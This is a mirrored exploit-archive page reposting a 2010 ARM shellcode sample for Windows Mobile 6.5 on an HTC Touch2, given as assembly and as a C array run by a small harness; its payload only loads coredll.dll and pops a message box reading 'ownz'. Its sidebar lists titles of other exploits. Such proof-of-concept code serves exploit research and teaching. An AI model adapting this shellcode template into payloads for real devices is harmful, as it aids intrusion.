首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)
来源:www.securityarchitect.org 作者:Celil 发布时间:2010-09-27  

/*

Device: HTC Touch2
System: Windows Mobile 6.5 TR (WinCE 5.0.2)

Addresses of functions can be different on different devices so , you can edit the functions addresses.

Coded by Celil Ünüver from SecurityArchitect

Contact:
 celilunuver[n*spam]gmail.com
 www.securityarchitect.org
 blog.securityarchitect.org

  EXPORT start
  AREA .text, CODE
start
  eor r0, r0, r0
  eor r1, r1, r1
  eor r2, r2, r2
  eor r3, r3, r3
  ldr R12, =0x3f6272c ; LoadLibrary Address
  adr r0, lib ; library name {coredll.dll}
  mov lr, pc
  mov pc, r12
  ldr r12, =0x3f7c15c ; MessageBox Address
  mov r0, #0
  adr r1, mes
  adr r2, mes
  mov R3, #0
  mov lr, pc
  mov pc, r12

lib  dcb "c",0,"o",0,"r",0,"e",0,"d",0,"l",0,"l",0,".",0,"d",0,"l",0,"l",0,0,0
mes  dcb "o",0,"w",0,"n",0,"z",0,0,0
  ALIGN
  END
*/

#include <stdio.h>
#include <windows.h>

int shellcode[] =
{
0xE0200000,
0xE0211001,
0xE0222002,
0xE0233003,
0xE59FC048,
0xE28F0020,
0xE1A0E00F,
0xE1A0F00C,
0xE59FC03C,
0xE3A00000,
0xE28F1024,
0xE28F2020,
0xE3A03000,
0xE1A0E00F,
0xE1A0F00C,
0x006F0063,
0x00650072,
0x006C0064,
0x002E006C,
0x006C0064,
0x0000006C,
0x0077006F,
0x007A006E,
0x00000000,
0x03F6272C,
0x03F7C15C,
};

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    ((void (*)(void)) & shellcode)();

    return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zenphoto Config Update and Com
·OvBB V0.16a Forum Remote SQL I
·Microsoft Cinepak Codec CVDeco
·TRAIDNT UP Version 3.0 Remote
·BS.Player 2.56 (Build 1043) .m
·VirIT eXplorer Lite DLL Hijack
·Gokhun ASP Stok v1.0 Multiple
·Embarcadero Delphi XE (2011) D
·MP3 Player Utilities 3.57 (AMV
·E-Xoopport - Samsara <= v3.1 (
·Apple Software Update 2.1.1.11
·Mozilla Firefox CSS font-face
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved